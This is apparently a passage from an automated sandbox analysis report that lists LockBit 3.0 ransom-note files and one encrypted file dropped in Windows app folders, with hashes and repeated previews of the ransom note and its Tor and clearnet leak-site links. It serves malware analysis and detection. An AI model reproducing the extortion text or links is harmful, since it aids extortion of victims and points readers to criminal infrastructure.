                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978213767128344
                Encrypted:false
                SSDEEP:96:Vt7hlvyraHHS6F7M+DX0fDshY2klLSLU8LTN8aaNdOLHSspV0nAiyux+vpSm8XtD:VtDNxVX0fDOisvaWRV0nxrMSn6rVo
                MD5:C5EA5C0F79A79E15F3D55623B9BB4EB2
                SHA1:B66910A80598815EA4EEEAF6CD8DE3C821EE2C91
                SHA-256:C14269F3607D7DD3FB4B00710639CC7E84714DBC5671797661D7F5DA616228C4
                SHA-512:F108BF510368ED7A4D1129F986E66A213476AE22A73669B33FBC1AEFF951A646BCAA9505C439F6C0FD1F5EBC19AA6B8B6F6E790DCB6A622B34B7419B252A8DD7
                Malicious:false
                Preview:.8V.u.....~.i..S.........(.(_..F..73..d..l.S1X..@l..`.D....G*..a.:........qI.Qu...D.mR..W$aJ.}M@..Y..W.)...h....%.d...*/......J\\..p.P@.e..{..\...w..n.V..pm..g.}4...u...J!.e.~p.R.t.+...uZ..;L...5....?@~'n...X.p....pi......j=.G.N._...Jq...e.....e)....e7.Q`p.V=......%.f.l.{.....%M.%.....vL...o...JXM.....7.W.......:F..or.F-...f..[m^=.6j...v.M.>...-.....~C..c..3jN+..V.8h.R..y..X...s..........]T..S:.HYDlYHg9`.;A....te.....O.........oNgLx.sr7.'.k.e.......L..P.8cOF.. Y..Y...mk.R.....T.H.@'w...`..OB(.E.....h.H..2..A...y{E.#N]-L@.a.............C...~D:x.oY..qb..6f.....C...|Zo..;'5w.i...K.&.d.........{2.>."..r...wr>LcN;%...^F...R-.us....Q..../..>u.g...P....A.."..L.co... 2.....V...C.:.#.{....*.'..\....a...cY. ..~vm^...f.a..xDB..*n...`.;....FN...N.zM....O5..$.B..u1j......T....e,ro.).....DS.*B.d.Q...\.b..".Q..0,G..y.u...N..8....X&z.y....,L...d.J.RK..2 ....vK.%.. ..p............P5LDH.......M.$...*.....j..an...U...oa*'h...3.(.Y...a../M....:...0.Q5f...Y0

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal 